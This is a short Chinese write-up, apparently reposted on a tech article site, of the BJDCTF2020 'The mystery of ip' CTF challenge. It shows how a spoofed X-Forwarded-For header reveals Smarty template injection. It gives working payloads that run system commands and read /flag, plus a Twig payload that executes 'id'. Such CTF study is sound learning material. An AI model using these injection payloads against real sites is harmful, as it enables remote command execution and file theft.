[BJDCTF2020]The mystery of ip
2022/4/13 23:20:23
本文主要是介绍[BJDCTF2020]The mystery of ip,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
[BJDCTF2020]The mystery of ip Write-Up
知识点
-
Smarty模板注入
-
能区分那个模板和其注入语法
题解
-
看见hint,抓包试一下,一般的ip都是通过请求头的cilent-ip、X-Forwarded-For等传过去的
-
发现没有这个请求头,自己加一个XFF写值看看是不是?发现变化
-
刚开始以为是sql注入,试了一下,貌似不对,可能是模板注入。记下下面这张图。用来区分那个模板,模板注入的语法非常多的。
-
经过测试,发现是Smarty模板
-
{{system('ls /')}}
-
{system("cat /flag")}
{if readfile('/flag')}{/if}
总结
-
以前还做过Twig模板注入, 总结一下这两个的语法
-
Twig:
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
-
Smarty:
{if php语句}{/if}
{if readfile('文件路径')}{/if}
这篇关于[BJDCTF2020]The mystery of ip的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-06-06Package Easy(基于 NSIS 的打包exe安装包工具)使用方法-icode9专业技术文章分享
- 2024-06-06基于 casdoor 的 ELK 开源登录认证解决方案: elk-auth-casdoor-icode9专业技术文章分享
- 2024-05-29Elasticsearch慢查询日志配置
- 2024-05-29揭秘华为如此多成功项目的产品关键——Charter模板
- 2024-05-29海外IDC业务拓展的7大挑战
- 2024-05-29InLine Chat功能优化对标Github Copilot,CodeGeeX带来更高效、更直观的编程体验!
- 2024-05-29CodeGeeX 智能编程助手 6 项功能升级,在Visual Studio插件市场霸榜2周!
- 2024-05-29AutoMQ 生态集成 Apache Doris
- 2024-05-292024年IDC行业的深度挖掘:机遇、挑战与未来展望
- 2024-05-29五款扩展组件齐发 —— Volcano、Keda、Crane-scheduler 等,邀你体验